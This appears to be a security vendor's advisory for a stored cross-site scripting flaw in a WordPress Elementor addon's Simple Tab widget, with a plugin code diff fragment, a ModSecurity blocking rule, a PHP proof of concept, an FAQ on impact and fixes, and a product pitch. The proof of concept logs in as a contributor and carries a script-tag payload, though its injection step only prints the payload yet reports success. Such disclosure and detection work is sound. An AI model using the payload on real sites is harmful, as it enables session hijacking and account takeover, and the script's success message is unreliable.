+		wp_register_script( 'isotope', ElementsKit_Lite::widget_url() . 'init/assets/js/isotope.pkgd.min.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for countdown timer
+		wp_register_script( 'final-countdown', ElementsKit_Lite::widget_url() . 'init/assets/js/jquery.countdown.min.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for piechart
+		wp_register_script( 'easy-pie-chart', ElementsKit_Lite::widget_url() . 'init/assets/js/jquery.easypiechart.min.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for magnific-popup
+		wp_register_script( 'magnific-popup', ElementsKit_Lite::widget_url() . 'init/assets/js/jquery.magnific-popup.min.js', array(), ElementsKit_Lite::version(), true );
+
+		// Core most of the widgets init are bundled
+		wp_enqueue_script( 'ekit-widget-scripts', ElementsKit_Lite::widget_url() . 'init/assets/js/widget-scripts.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for mailchimp
+		wp_register_script( 'ekit-mailchimp', ElementsKit_Lite::widget_url() . 'init/assets/js/mail-chimp.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for gallery
+		// wp_register_script( 'tilt', ElementsKit_Lite::widget_url() . 'init/assets/js/tilt.jquery.min.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for pricing table
+		// wp_register_script( 'ekit-google-map', ElementsKit_Lite::widget_url() . 'init/assets/js/google-map.js', array(), ElementsKit_Lite::version(), true );
+
+		// register script for pricing table
+		wp_register_script( 'ekit-info-tip', ElementsKit_Lite::widget_url() . 'init/assets/js/info-tip.js', array(), ElementsKit_Lite::version(), true );
+
+
+
+		// sosial share
+		wp_register_script( 'goodshare', ElementsKit_Lite::widget_url() . 'init/assets/js/goodshare.min.js', array( 'jquery' ), ElementsKit_Lite::version(), true );
+
+		// table
+		wp_register_script( 'datatables', ElementsKit_Lite::widget_url() . 'init/assets/js/datatables.min.js', array( 'jquery' ), ElementsKit_Lite::version(), true );
+
+		// Google Map widget scripts
+		$user_data = Attr::instance()->utils->get_option('user_data', []);
+		$gmap_api_key = !empty($user_data['google_map']) ? $user_data['google_map']['api_key'] : '';
+		wp_register_script( 'ekit-google-map-api', 'https://maps.googleapis.com/maps/api/js?key=' . $gmap_api_key . '', array('jquery'), ElementsKit_Lite::version(), true );
+		wp_register_script( 'ekit-google-gmaps', ElementsKit_Lite::widget_url() . 'init/assets/js/gmaps.min.js', array('jquery'), ElementsKit_Lite::version(), true );
+
+		// funfact widget
+		wp_register_script( 'odometer', ElementsKit_Lite::widget_url() . 'init/assets/js/odometer.min.js', array('jquery'), ElementsKit_Lite::version(), true );
+
+		// Animate Circle Script
+		wp_register_script( 'animate-circle', ElementsKit_Lite::widget_url() . 'init/assets/js/animate-circle.min.js', [], ElementsKit_Lite::version(), true );
+	}
+
+	public function enqueue_scripts() {
+		// Enqueue Scripts
+		wp_enqueue_script( 'elementskit-elementor', ElementsKit_Lite::widget_url() . 'init/assets/js/elementor.js', ['jquery', 'elementor-frontend'], ElementsKit_Lite::version(), true );
+		wp_localize_script( 'elementskit-elementor', 'ekit_config', [
+			'ajaxurl'   => admin_url( 'admin-ajax.php' ),
+			'nonce'     => wp_create_nonce( 'ekit_pro' ),
+		] );
+
+		// compatibility
+		if($this->is_plugin_active('elementskit/elementskit.php') && version_compare(Elementskit::version(), '3.2.0', '<=')) {
+			// added swiper js - elementor remove it when "Improved Asset Loading" is active
+			if(defined('ELEMENTOR_ASSETS_URL')) {
+				wp_enqueue_script(
+					'swiper',
+					ELEMENTOR_ASSETS_URL . 'lib/swiper/swiper.min.js',
+					[],
+					ElementsKit_Lite::version(),
+					true
+				);
+			}
+		}
+
+		// added fluent form styles on the editor
+		if (in_array('fluentform/fluentform.php', apply_filters('active_plugins', get_option('active_plugins')))) {
+			wp_enqueue_style( 'fluent-form-styles' );
+			wp_enqueue_style( 'fluentform-public-default' );
+		}

 		// register scripts for lottie
-        wp_register_script( 'lottie', ElementsKit_Lite::widget_url() . 'lottie/assets/js/lottie.min.js', [], ElementsKit_Lite::version(), true );
-        wp_register_script( 'lottie-init', ElementsKit_Lite::widget_url() . 'lottie/assets/js/lottie.init.js', ['lottie', 'elementor-frontend'], ElementsKit_Lite::version(), true );
-    }
-
-    public function elementor_css(

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2600
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20262600,phase:2,deny,status:403,chain,msg:'CVE-2026-2600 via ElementsKit Simple Tab widget XSS',severity:'CRITICAL',tag:'CVE-2026-2600',tag:'wordpress',tag:'elementskit',tag:'xss'"
  SecRule ARGS_POST:action "@rx ^(wp_ajax_)?elementskit" "chain"
    SecRule ARGS_POST:ekit_tab_title "@rx [<>"']" 
      "t:lowercase,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,chain"
      SecRule ARGS_POST:ekit_tab_title "@rx (?i)<script[^>]*>|javascript:|onw+s*=" 
        "t:lowercase,t:urlDecodeUni,t:htmlEntityDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2600 - ElementsKit Elementor Addons and Templates <= 3.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Simple Tab Widget

<?php
/**
 * Proof of Concept for CVE-2026-2600
 * Requires: Contributor-level WordPress credentials
 * Target: WordPress site with ElementsKit Elementor Addons plugin <= 3.7.9
 */

$target_url = "https://vulnerable-site.com"; // CHANGE THIS
$username = "contributor_user"; // CHANGE THIS
$password = "contributor_pass"; // CHANGE THIS

// Malicious payload to inject
$payload = '"><script>alert("Atomic Edge XSS Test");</script>';

// Step 1: Authenticate and get WordPress nonce
function get_wp_nonce($target_url, $username, $password) {
    $login_url = $target_url . "/wp-login.php";
    $admin_url = $target_url . "/wp-admin/";
    
    // Create cookie jar
    $cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_2600');
    
    // Login to WordPress
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $login_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => $cookie_file,
        CURLOPT_COOKIEFILE => $cookie_file,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query([
            'log' => $username,
            'pwd' => $password,
            'wp-submit' => 'Log In',
            'redirect_to' => $admin_url,
            'testcookie' => '1'
        ])
    ]);
    
    $response = curl_exec($ch);
    
    // Extract nonce from Elementor editor
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . "/wp-admin/post-new.php?post_type=page",
        CURLOPT_POST => false
    ]);
    
    $editor_page = curl_exec($ch);
    curl_close($ch);
    
    // Look for Elementor nonce
    preg_match('/"nonce":"([a-f0-9]+)"/', $editor_page, $matches);
    return isset($matches[1]) ? $matches[1] : false;
}

// Step 2: Create page with malicious Simple Tab widget
function exploit_xss($target_url, $cookie_file, $nonce, $payload) {
    $ch = curl_init();
    
    // Create a new page
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . "/wp-admin/post-new.php",
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE => $cookie_file,
        CURLOPT_COOKIEJAR => $cookie_file,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query([
            'post_type' => 'page',
            'post_title' => 'Atomic Edge Test Page',
            'content' => '[elementor-template id=""]',
            'publish' => 'Publish',
            'save' => 'Publish'
        ])
    ]);
    
    $response = curl_exec($ch);
    
    // Extract page ID
    preg_match('/post=([0-9]+)/', $response, $matches);
    $page_id = isset($matches[1]) ? $matches[1] : false;
    
    if (!$page_id) {
        echo "Failed to create pagen";
        return false;
    }
    
    echo "Created page ID: $page_idn";
    
    // Step 3: Inject payload via Elementor editor
    // Note: Actual implementation would require Elementor's internal API
    // This demonstrates the concept - real exploitation uses Elementor's widget save mechanism
    
    echo "Payload: $payloadn";
    echo "Vulnerable parameter: ekit_tab_titlen";
    echo "Attack vector: Store XSS via Simple Tab widget title fieldn";
    
    curl_close($ch);
    return $page_id;
}

// Execute PoC
$nonce = get_wp_nonce($target_url, $username, $password);

if ($nonce) {
    echo "Obtained nonce: $noncen";
    $cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_2600_cookie');
    $page_id = exploit_xss($target_url, $cookie_file, $nonce, $payload);
    
    if ($page_id) {
        echo "Exploit successful! Visit: $target_url/?p=$page_idn";
        echo "The XSS payload should execute when viewing the page.n";
    }
} else {
    echo "Failed to authenticate or obtain noncen";
}

?>

Frequently Asked Questions

What is CVE-2026-2600?
Overview of the vulnerability
CVE-2026-2600 is a stored cross-site scripting (XSS) vulnerability in the ElementsKit Elementor Addons and Templates plugin for WordPress, affecting versions up to 3.7.9. It allows authenticated users with contributor-level access or higher to inject arbitrary JavaScript into page content via the ‘ekit_tab_title’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping. When a user with the appropriate access level inputs a malicious script into the Simple Tab widget’s title, it is stored in the database and executed when other users view the affected page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the ElementsKit Elementor Addons and Templates plugin version 3.7.9 or earlier is vulnerable. Specifically, authenticated users with contributor-level access or higher can exploit this issue.
How can I check if my site is vulnerable?
Steps for assessment
To determine if your site is vulnerable, check the version of the ElementsKit plugin installed. If it is version 3.7.9 or earlier, your site is at risk. Additionally, review user roles to see if any contributors have access to the Simple Tab widget.
How can I fix CVE-2026-2600?
Mitigation steps
The vulnerability is fixed in version 3.8.0 of the ElementsKit plugin. Update the plugin to the latest version to ensure that proper input sanitization and output escaping are applied to the ‘ekit_tab_title’ parameter.
What is the risk level associated with this vulnerability?
Understanding the CVSS score
CVE-2026-2600 has a CVSS score of 6.4, indicating a medium severity level. This means that while exploitation requires authenticated access, successful attacks can lead to significant security issues such as session hijacking and content manipulation.
What are the potential consequences of exploitation?
Impact of successful attacks
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the browsers of users viewing the compromised page. This could result in session hijacking, administrative account takeover, or distribution of malware.
How does the proof of concept demonstrate the issue?
Understanding the demonstration
The proof of concept provides a script that simulates an attack by authenticating a contributor user and injecting a malicious payload into the Simple Tab widget. It illustrates how an attacker can exploit the vulnerability to execute JavaScript on a vulnerable site.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updating is not possible, consider disabling the ElementsKit plugin until a secure version can be installed. Additionally, review user roles and limit contributor access to prevent potential exploitation.
Is this vulnerability common in WordPress plugins?
Context of XSS vulnerabilities
Stored XSS vulnerabilities are not uncommon in WordPress plugins, particularly those that allow user-generated content. It highlights the importance of proper input validation and output escaping in plugin development.
What are the best practices to prevent similar vulnerabilities?
Security measures for WordPress sites
To prevent similar vulnerabilities, ensure all plugins are regularly updated, implement strict user role management, and conduct regular security audits. Additionally, consider using security plugins that provide XSS protection.
Where can I find more information about CVE-2026-2600?
Further reading and resources
More information about CVE-2026-2600 can be found in the National Vulnerability Database and on security advisory websites. Additionally, the plugin’s changelog will provide insights into the specific changes made in the patched version.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations